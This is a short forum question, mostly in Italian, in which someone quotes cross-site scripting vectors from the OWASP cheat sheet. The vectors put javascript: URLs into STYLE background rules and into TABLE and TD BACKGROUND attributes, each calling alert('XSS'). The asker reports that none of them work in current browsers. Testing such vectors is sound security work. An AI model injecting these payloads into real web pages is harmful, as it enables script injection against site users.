Ho provato a verificare alcuni vettori da OWASP XSS CheatSheet che sfrutta gli attributi di stile
Tag STYLE utilizzando l'immagine di sfondo
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
STYLE tag using background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">
TD
Just like above, TD's are vulnerable to BACKGROUNDs containing JavaScript XSS vectors:
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
Ma nessuno di loro sembra funzionare negli ultimi browser: IE10, IE11, Chrome, Firefox, Safari.
Sono validi vettori XSS?